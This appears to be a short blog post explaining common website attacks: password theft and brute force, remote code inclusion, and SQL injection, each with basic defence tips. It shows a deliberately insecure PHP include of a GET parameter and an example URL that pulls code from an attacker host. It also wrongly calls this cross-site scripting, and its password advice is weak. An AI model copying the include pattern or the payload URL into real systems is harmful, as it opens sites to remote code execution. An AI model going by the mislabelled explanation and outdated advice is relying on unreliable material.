Here are the most common techniques used to hack a website

Hacking sites that are least protected by password – By pass authentication

It’s the webmaster’s nightmare, hackers accessing the site using stolen passwords which should be under control. Usually hackers will be well known persons who they know. They use various techniques to steal the password. They access their emails; they use key loggers or network sniffers to identify the password which they use for their day to day work.

Hackers can also use techniques such as brute force attack (dictionary attacks) etc and can find the weak passwords. The more the complex password, the more difficult for hackers to identify the password using this method.

How to defend

* It’s advised to have the passwords made of capital letters, small letters, numbers and symbols and should be at least 6-10 digits long.
* Change the passwords at frequent interval
* Don’t store the passwords in email
* Use the latest antivirus software to make sure that the system is free of key loggers

XSS or the cross site scripting

In this method hacker again access to your website using previously disclosed or undisclosed security vulnerability of the server software or the scripting language. Hackers try to execute a code hosted on a remote computer and will access the secure areas of the websites.

For example in Apache/ php if you try to include a page like this

#include $_GET[page];

And use the get request to include aboutus.php like this http://yoursite.php/?page=aboutus. Hackers can execute remotely hosted page like this http://yoursiite.com/?page=http://hackerssite.com/directorylist.php

This method is the simplest and many variations of the following the methods are there, like using intercepting JavaScript and execute XSS attacks. Now a day it’s too common as the webmasters more towards web2.0 techniques and using loosely coded AJAX techniques.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

* Aware of the XSS attacks happening around
* Update the web server software and server scripting language
* Disable unwanted service from server software

SQL injection

In this type of attack, hackers take advantage of the comprised database. Hackers inject carefully written SQL codes through the forms available on the website. [registration, feedback form etc]. read more about these type of attach here

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

* Clean up the inputs before inserting to the database
* Properly escape input strings

Explore More

Blind SQL Injection

Blind injection: you dont actually see anything, you just see how the server responds.Blind injection is a little more complicated/time consuming, but when your injection is multi-select and union isn’t

A Perfect Keyword Rich Webpage

How to create a perfect keyword rich web page? We tried many ways to create one. Here is the Part 1 of our experiments with SEO (Search engine optimization techniques).

What is a stealth virus?

A stealth virus is a file virus. It infects the computer and then hides itself from detection by antivirus software. It uses various mechanisms to avoid detection by antivirus software.